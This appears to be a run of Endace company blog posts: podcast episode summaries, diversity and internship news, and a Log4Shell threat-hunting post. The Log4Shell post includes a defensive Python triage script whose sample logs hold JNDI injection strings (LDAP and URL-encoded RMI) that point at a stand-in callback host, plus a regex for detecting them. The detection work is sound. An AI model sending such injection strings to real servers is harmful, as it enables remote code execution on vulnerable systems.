Endace Packet Forensics Files: Episode #32

Original Entry by : Michael Morris

Michael talks to Merritt Baer, Principal in the Office of the CISO at AWS

By Michael Morris, Director of Global Business Development, Endace



Is your organization trying to implement enterprise-level security at scale and you’re not sure where to focus?

In this episode of the Endace Packet Forensic files I talk with Merritt Baer, Principal in the Office of the CISO at AWS, who shares her experience in how to design and build robust, dynamic security at scale. Merritt discusses what security at scale looks like, some of the things that are often missed, and how to protect rapidly evolving hybrid cloud infrastructures. She highlights some common pitfalls that organizations run into as they shift workloads to cloud providers and how to pivot your SOC teams and tools to ensure you have robust security forensics in place.

Finally, Merritt examines how adopting SOAR platforms can help, and things you can do to prevent gaps and breakdowns in your security posture.

Other episodes in the Secure Networks video/audio podcast series are available here.


Log4j 2: A Week Look Back

Original Entry by : Michael Morris

Do you know if you have been attacked?

By Michael Morris, Director of Global Business Development, Endace



Log4j 2 - how can you see if you've been attacked?

Many organizations have been scrambling this week to search their networks for any use of Log4j 2 libraries and to quickly patch the applications, systems, appliances, or devices that might be using them. Lots of cycles are being spent reaching out to equipment and software vendors to determine whether their systems or applications are potentially impacted, and applying fixes and updates to stop potential compromises. The primary response for most security teams has been to apply patches and plug the holes.

But what exactly is the threat? The Apache Log4j 2 Java library is affected by a remote code execution vulnerability (CVE-2021-44228) known as Log4Shell. It gives remote, unauthenticated attackers the ability to execute arbitrary code loaded from a malicious server with the privileges of the process that uses Log4j 2.

It is nicely illustrated in this diagram from the Swiss Government Computer Emergency Response Team:


Figure: Log4j 2 JNDI attack process (from: https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/)

Any system with this vulnerability is now an entry point for the seeding or running of remote code execution that could then conduct any number of other nefarious activities.

I have been reading numerous articles and attending various seminars from threat intel teams such as Palo Alto Networks Unit 42 that discuss the scale and severity of the potential risks to organizations from this zero-day threat. There are several key takeaways I have learned.

First, because of the prevalence of this vulnerability, literally millions of systems are at risk. Second, because of the scale of attacks leveraging this vulnerability there have already been several compromises and ransomware attacks. However, a lot of the current threat actor activity to this point appears to be reconnaissance and planting of additional malware that can be used later after threat actors have obtained initial access to a network and systems on it.

Our technology partner, Keysight Technologies, has been tracking honeypot activity which shows huge numbers of exploitation attempts – demonstrating how many threat actors are scanning the internet looking for vulnerable systems.

Industry-wide there are already a huge number of bots scanning the internet simply looking for openings. Key advice from threat intel teams is to immediately isolate any impacted servers as they are truly open backdoors to the rest of your infrastructure. There are numerous tools out there to scan your environment for Log4j 2 use.

Anywhere that Log4j 2 is found, you need to isolate the system and investigate it for any potential compromise. It’s essential to put in place policies, rules, and filter protections to monitor outbound (egress) traffic to unknown IP addresses. Apply filters and pay extra attention to protocols such as LDAP, LDAPS, RMI, and DNS, as these are the key protocols being leveraged for lateral movement and reconnaissance. If you are unable to isolate potentially compromised systems, look for anomalous or unexpected traffic to and from them.

Of course, you should also ensure your IDSs and firewalls have updated rule sets for Log4j 2 so that you can block or detect any future attempts to infect your network. This needs to be done quickly so you can get on with the job of reviewing any damage that may have been done.

If you’re collecting network metadata in a SIEM such as Splunk or Elastic, the first place to start looking is to search all HTTP transactions for strings containing JNDI lookups. Our partner, Splunk, published a blog on how to do this here:

https://www.splunk.com/en_us/blog/security/log4shell-detecting-log4j-vulnerability-cve-2021-44228-continued.html

Once you have identified any JNDI calls, it’s critical to review the recorded network packet data to determine if any outgoing connections were made from potentially compromised servers.

EndaceProbes can capture weeks or months of packet data, allowing you to quickly review potential threats that may have occurred prior to the public announcement of the Log4j 2 vulnerability. Chris Greer published a very useful YouTube video on how to use Wireshark to identify and analyze a Log4j 2 attack. Well worth watching.

Once you have identified connections that contain the JNDI string, you can quickly examine any subsequent outgoing connections from the affected host to see whether it successfully contacted the malicious LDAP server and downloaded Java malware. Knowing whether this step did or did not happen will save your team many days of incident response and allow them to focus on the servers that have actually been compromised.
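The two-stage triage described above (find the HTTP transactions carrying a JNDI lookup, then check whether the targeted host made an outbound LDAP, LDAPS, RMI or DNS connection afterwards, as the egress-monitoring advice earlier in the post recommends) can be expressed as a small correlation script. The following is an added example and is not Endace’s, Splunk’s or Chris Greer’s code; it runs over constructed sample records in the shape of an HTTP transaction log and a Zeek-style connection log, and the host addresses, timestamps and five-minute correlation window are assumptions for illustration.

```python
"""Log4Shell (CVE-2021-44228) triage helper: JNDI hits joined to later egress.

Added example, not from the original post. Stage 1 scans HTTP request fields
for a "${jndi:" lookup (after URL-decoding and case-folding, so a trivially
encoded request is not missed). Stage 2 lists, for each hit, the outbound
connections the targeted host made to LDAP/LDAPS/RMI/DNS ports shortly after.
A non-empty list means the host reached out and its packet data needs review;
an empty list suggests the lookup was blocked or never resolved.
All records below are constructed sample data."""
import re
from datetime import datetime, timedelta
from urllib.parse import unquote

# Indicator the post describes: a JNDI lookup string in any logged request field.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# Destination ports for the protocols the post calls out for egress monitoring.
SUSPECT_PORTS = {389: "LDAP", 636: "LDAPS", 1099: "RMI", 53: "DNS"}

# Constructed HTTP transactions: time, server that received the request, fields.
HTTP_LOG = [
    {"ts": "2021-12-10T09:00:01", "dst": "10.0.1.20", "uri": "/login", "ua": "Mozilla/5.0"},
    {"ts": "2021-12-10T09:02:15", "dst": "10.0.1.20", "uri": "/",
     "ua": "${jndi:ldap://callback.example.invalid:389/a}"},
    {"ts": "2021-12-10T09:05:40", "dst": "10.0.1.30",
     "uri": "/search?q=%24%7Bjndi%3Armi%3A%2F%2Fcallback.example.invalid%3A1099%2Fb%7D",
     "ua": "curl/7.79"},
    {"ts": "2021-12-10T09:07:00", "dst": "10.0.1.40", "uri": "/healthz", "ua": "kube-probe/1.22"},
]

# Constructed connection records (Zeek conn.log style): time, source host, destination, port.
CONN_LOG = [
    {"ts": "2021-12-10T09:02:16", "src": "10.0.1.20", "dst": "203.0.113.9", "dport": 389},
    {"ts": "2021-12-10T09:02:17", "src": "10.0.1.20", "dst": "203.0.113.9", "dport": 8080},
    {"ts": "2021-12-10T09:05:41", "src": "10.0.1.30", "dst": "10.0.0.2", "dport": 53},
    {"ts": "2021-12-10T09:07:01", "src": "10.0.1.40", "dst": "10.0.0.2", "dport": 53},
]


def parse_ts(s: str) -> datetime:
    return datetime.fromisoformat(s)


def has_jndi(value: str) -> bool:
    """True if the field contains a JNDI lookup after up to two layers of URL-decoding."""
    decoded = value
    for _ in range(2):
        decoded = unquote(decoded)
    return bool(JNDI_RE.search(decoded))


def find_jndi_hits(http_log):
    """Stage 1: (timestamp, targeted host) for every request carrying a JNDI lookup."""
    hits = []
    for rec in http_log:
        if any(has_jndi(rec[field]) for field in ("uri", "ua")):
            hits.append((parse_ts(rec["ts"]), rec["dst"]))
    return hits


def correlate_outbound(hits, conn_log, window=timedelta(minutes=5)):
    """Stage 2: per targeted host, outbound connections to a suspect port within `window`
    after the request. DNS to the internal resolver is reported too, because the post
    lists DNS among the protocols to watch; an analyst decides whether it is benign."""
    findings = {}
    for hit_ts, host in hits:
        later = []
        for c in conn_log:
            c_ts = parse_ts(c["ts"])
            if c["src"] == host and c["dport"] in SUSPECT_PORTS and hit_ts <= c_ts <= hit_ts + window:
                later.append((c["ts"], c["dst"], SUSPECT_PORTS[c["dport"]]))
        findings[host] = later
    return findings


def triage(http_log=HTTP_LOG, conn_log=CONN_LOG):
    """Run both stages; keys are hosts that received a JNDI lookup."""
    return correlate_outbound(find_jndi_hits(http_log), conn_log)


if __name__ == "__main__":
    for host, conns in triage().items():
        status = "REACHED OUT - review packets" if conns else "no suspect egress seen"
        print(f"{host}: {status}")
        for ts, dst, proto in conns:
            print(f"    {ts} -> {dst} ({proto})")
```

In the sample data, 10.0.1.20 received a JNDI lookup in its User-Agent and connected to an external LDAP port one second later, so it goes to the top of the packet-review queue; 10.0.1.30 received a URL-encoded lookup but only queried the internal resolver, consistent with egress filtering having stopped the second stage; 10.0.1.40 never saw a lookup at all. On real data the HTTP records would come from the SIEM search the Splunk post describes and the connection records from the captured packet metadata.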

Good luck with the Log4j 2 threat hunting! To learn more about how cost-effective and simple it can be to have an always-on network packet capture platform integrated with the rest of your security tools to help you search for Log4j 2 and other zero-day attacks, go to www.endace.com.


Endace Packet Forensics Files: Episode #31

Original Entry by : Michael Morris

Michael talks to Kamal Khlefat, Product Manager, LinkShadow

By Michael Morris, Director of Global Business Development, Endace



Modernizing the SOC is one of the latest trends cyber security teams are undertaking to stay current and on a level playing field against today’s threat actors. Whether it is adapting simply to keep up with the volume of threats or implementing AI and ML technologies to find and prevent more sophisticated threat vectors, SecOps teams need to improve and upgrade.

In this episode of the Endace Packet Forensic files, I talk with seasoned SOC Director, Kamal Khlefat, now Product Manager at LinkShadow, who shares his perspectives on the movement to modernize the SOC.

Kamal gives his insight into where most SOC teams are struggling and the gaps organizations have in their cybersecurity defenses. He shares some observations about what customers are doing to handle ever-increasing alert volumes and the fatigue analysts suffer in their relentless effort to investigate and troubleshoot every indicator of compromise. And, finally, Kamal highlights some of the differences he is seeing between various industry verticals like governments, financial, energy and retail.

Other episodes in the Secure Networks video/audio podcast series are available here.


Diversity and Inclusion at Endace

Original Entry by : Katrina Schollum

By Katrina Schollum, People Partner, Endace


Since we established our Diversity and Inclusion Committee earlier this year, we have been busy working to cement the importance of our Diversity and Inclusion program at Endace.

As a group, we have held regular discussions across our four focus areas: gender, ethnicity, generations and people with different abilities, to establish how we can achieve positive outcomes for people and the business, increase awareness and break down barriers. We are committed to community-led objectives that support and celebrate individuality and foster a sense of belonging for everyone. In this blog post we are pleased to share some of our progress.

Establishing Who We Are

It was important to us to understand who we are at Endace, and what is important to us as we shape our path forward.

We created anonymous reporting on gender, nationality and cultural ethnicity and were able to share the statistical data visually with the whole organisation, which we will continue to do as we track our changes over time. We can report we have at least 24 different nationalities within Endace and we are extremely proud of our very culturally diverse workplace.

One of our biggest pieces of work was an internal survey that sought specific input across our four key areas. The Committee invested a lot of effort into asking the right questions so we could understand where there was lack of clarity, what areas we are doing well in and what areas need improvement to focus on. As a result, we were able to clarify our key messages and share these across the organization via various channels including workshops, promotional activity such as email newsletters and posters, and team meetings.

Winning entry in the Endace Diwali decoration competition

We were also able to meet a popular request to celebrate key cultural occasions throughout the year – such as sharing Māori-themed food at our New Zealand offices to celebrate Matariki (which marks the beginning of the new year in the Māori lunar calendar). In addition, we celebrated Diwali with a global team competition to learn more about this festival of lights. We plan to promote and celebrate many more of these occasions on an ongoing basis – giving everyone at Endace an opportunity to learn more about other cultures represented in the team.

These activities are all great examples of the success of our community-led approach. By seeking input from the entire team we better understand what’s important and where we can add value to our diversity and inclusion initiatives. Sometimes it is relatively simple things that can make a big difference.

Community Led Initiatives
Marjo Montejo reflects on women in technology on International Women’s Day

Our Committee has put together a plan of strategic, measurable objectives from our group discussions. Some of the activities that have already been delivered include calendar events such as World Autism Awareness Day. We also highlighted International Women’s Day by sharing photos and personal stories about what the day meant to our team, and about what it means to be a woman in the tech industry.

We also recently held Cultural Intelligence workshops that were attended by 79.5% of our organisation. The workshops gave us tools to improve on the understanding of cultures other than our own and break down barriers to support greater participation, integration and increase the sense of belonging.

Recently, for Transgender Awareness Week, a member of our transgender community at Endace shared his story in a powerful interview with Sasha Blair, VP People & Legal, to answer some questions about the trans community and his experiences. The recording was shared internally and some fantastic feedback was received. Our ongoing conversations around gender have made a noticeable difference in using gender-neutral and inclusive language.

What’s Next?

Looking ahead, we have planned some thought-provoking activities to celebrate and support individuals. The immediate focus will be educating ourselves on Neurodiversity and understanding how it adds value to our business.

Neurodiversity in the tech sector has at times been overlooked but major tech organisations are making great strides in this area and we are keen to see how we can contribute to these initiatives too.

While change takes time, we will continue to celebrate what makes Endace unique and keep taking steps to ensure our team can strengthen their feeling of belonging, and feel their individual voices are heard, valued and respected. We anticipate that the more initiatives we implement in our organisation, the more positive outcomes we will observe. Our agenda will support us in achieving an increasingly inclusive environment and we look forward to sharing our progress.


Our 2021/22 Internship Program Begins

Original Entry by : Katrina Schollum

We are very pleased to have recently welcomed six Interns to join us for their 13-week R.E.A.L (remarkable, enjoyable, authentic, learning) Summer Internship program in our R&D Center in Hamilton, New Zealand. We had a fantastic response to, and level of interest in, our individual projects and we look forward to seeing what this year’s Interns can learn and achieve.

Induction Day

Working remotely meant a different look and feel for Day 1 of our program, with introductions happening via Teams. Our Interns were introduced to life at Endace virtually, including a welcome from our CEO Stuart Wilson.

The afternoon kicked off with a team-building activity which was facilitated by Team Up Events and involved 4 different teams in an online race against the clock. Moving around the continents, learning, answering questions, taking group photos, and lots of laughs – it was a fun part of the day getting to know our new team members and testing how good our online communication skills have become!

One of our mentors, Norbert, confirmed the ‘Travel Around the World’ activity was “fun for us, but also a good chance to get to know the Interns and break the ice – which is not easy working remotely.” After the ice was broken our Interns and their individual mentors had the opportunity to continue the conversation and begin their projects together.

Our Program

We are proud of our history, contribution to ongoing learning and continuing our strong bonds to our company origins in tertiary education. From day one, our Interns learn about Endace’s history and products and develop relationships with their mentors. This year, we are thrilled to have three mentors and managers who, in previous years, were themselves Endace Interns and offer unique insight from both sides of the relationship. Sam, one of the new mentors, said “being an Intern at Endace was challenging but in the best possible way. I learned so much in such a short time, and the support and guidance I received along the way allowed me to make a smooth transition from study into the workplace. I am excited to be able to pass on some of what I learned to the next crop of Interns.”

Across 13 weeks the Internship program focuses on commercially relevant, individual projects and providing structured training including lunch-and-learns to introduce other areas of the business such as finance, HR, marketing and operations to create a well-rounded experience. The Internship program culminates with our Interns delivering a presentation at a shared learning session involving Interns and their mentors, members of the senior leadership team and project managers.

2021/22 Interns’ first day in the office

The Endace Internship Program is a great way to help computer science students and graduates build talent and experience and grow the industry. It also helps us showcase Endace as an employer of choice for IT and engineering graduates in New Zealand.

Our Interns become sought-after graduates with meaningful, hands-on experience and we will be following their achievements with interest. It was fantastic to finally have our Interns join us in the office so we could meet face-to-face, and we look forward to seeing them share their progress at the close of the program.


Endace Packet Forensics Files: Episode #30

Original Entry by : Michael Morris

Michael talks to Tony Krzyzewski, Director of SAM for Compliance and Global Cyber Alliance Ambassador

By Michael Morris, Director of Global Business Development, Endace



In this episode of the Endace Packet Forensic files, I talk with Tony Krzyzewski, Director of SAM for Compliance, Global Cyber Alliance Ambassador, and New Zealand’s Convenor on the International Standards Organization SC27 Information Security, Cybersecurity and Privacy Protection Standards Committee.

With more than four decades working in IT and networking, and almost three decades in cybersecurity, there are few more experienced practitioners than Tony. In this episode, Tony draws on his extensive experience to give some practical, pragmatic advice about where organizations need to focus to improve their cyber defenses. He highlights the importance of focusing on operational management processes for any cyber security program and reinforces the mantra I have been hearing from many CISOs about the importance of regularly practising and performing “Security FireDrills”.

Tony talks about his long-time campaign to encourage organizations to adopt DMARC, “Domain-based Message Authentication, Reporting and Conformance” policies to improve protections against fraudulent email and phishing attacks.

Finally, Tony gives his perspective on the massive surge in SOAR and XDR solutions in the market and how that is impacting organizations’ security postures, and puts on his predictions hat as he talks about what to look out for in the year ahead.

Other episodes in the Secure Networks video/audio podcast series are available here.


Endace Packet Forensics Files: Episode #29

Original Entry by : Michael Morris

Michael talks to Tim Dales, VP Labs and Analyst, IT Brand Pulse

By Michael Morris, Director of Global Business Development, Endace



What is the “Total Cost of Ownership” for security teams to get absolute forensics with full packet capture?

In this episode of the Endace Packet Forensic files, I talk with Tim Dales, VP of Labs and Analyst for IT Brand Pulse. Tim shares the results of an IT Brand Pulse study that examines the cost of in-house developed packet capture solutions versus off-the-shelf, vendor-built solutions.

Tim shares details of the report’s findings including the pros and cons and some of the key things many people don’t consider before trying to build solutions in-house.

Finally, Tim discusses key changes in how organizations are thinking about their security architectures and the gaps they are looking to address. He shares the importance of integrated workflows in helping analysts to accelerate investigation times and confirm or dismiss potential indicators of compromise more definitively.

Other episodes in the Secure Networks video/audio podcast series are available here.


Endace Packet Forensics Files: Episode #28

Original Entry by : Michael Morris

Michael talks to Tim Wade, Director, Office of the CTO, Vectra AI

By Michael Morris, Director of Global Business Development, Endace



Security Operations teams at many organizations are reviewing processes and tools as breaches continue to happen, investigation times remain too long, outcomes are uncertain, and too many alerts are going unaddressed. Organizations are asking, “why are we spending so much money on security without tangible results?” They are looking at “SOC Modernization” initiatives to help them defend effectively against increasingly sophisticated threat actors.

In this episode of the Endace Packet Forensic files I talk with Tim Wade, Technical Director from the Office of the CTO at Vectra.AI, who shares his insights into the “SOC Modernization” trend and three pillars that he suggests require a change in thinking to ultimately be successful.

Tim starts with a fundamental change in philosophy – he suggests SOC teams need to shift from a “prevention” to a “resiliency” approach to cyberdefense. He illustrates the importance of taking incremental and iterative steps with monthly and even weekly measurement and review cycles to evaluate progress.

Tim suggests SOC teams need to better understand the rules of the game so they can step back and actively work to break them – because that is exactly what our threat actor adversaries are doing every day. Challenge everything and think like your opponent.

Finally, Tim advises CISOs that modernization needs to address challenges holistically. Not just focusing on technologies, but also ensuring they are working on people and processes and gaps in training, communication, and thinking.

Other episodes in the Secure Networks video/audio podcast series are available here.


Endace Packet Forensics Files: Episode #27

Original Entry by : Michael Morris

Michael talks to Phillip Solakov, Client Solutions Director at Optiv

By Michael Morris, Director of Global Business Development, Endace


Cyber security teams around the globe are embarking on a variety of “modernization” initiatives as they try to keep up with the dynamic threat landscape, but what are the must-have elements if you are looking to modernize your SOC?

You won’t want to miss this episode of the Endace Packet Forensic files as I talk with Phillip Solakov, Client Solutions Director for Optiv Canada, as he shares his view of what “SOC Modernization” means and what’s driving these efforts.

Phillip explains some of the biggest issues SOC teams are facing and things they are working on to overcome these challenges. He drills into how alert fatigue is compounded with more detection tools, more telemetry and why it is becoming critical for more automation in SOC processes and tools.

Finally, Phillip highlights some things SOC teams are still missing with the continuously expanding attack surface, and he gives some examples of how these gaps can still be addressed with the right security architecture and mindset.

Other episodes in the Secure Networks video/audio podcast series are available here.


Endace Packet Forensics Files: Episode #26

Original Entry by : Michael Morris

Michael talks to Pavel Minarik, CTO of Kemp Technologies

By Michael Morris, Director of Global Business Development, Endace



Many organizations are undertaking SOC and NOC modernizations, but what does this mean and what is driving it?

If your company is planning a “modernization” you won’t want to miss this episode of the Endace Packet Forensic files as Pavel Minarik, CTO of Kemp Technologies, talks about what’s important and what is fueling the need to modernize.

Pavel gives his insights into some of the biggest challenges NOCs and SOCs are facing and shares some tips to help these separate teams work together and collaborate more. He underscores why this is becoming more important with increasing network complexity, virtualization, and escalating threat attack vectors.

Finally, Pavel talks about why network traffic is such a foundational data source for both NOCs and SOCs and the pros and cons of flow-based monitoring vs full packet monitoring. He shares the best practices analysts are adopting to improve investigation efficiency and reduce incident response times.

Other episodes in the Secure Networks video/audio podcast series are available here.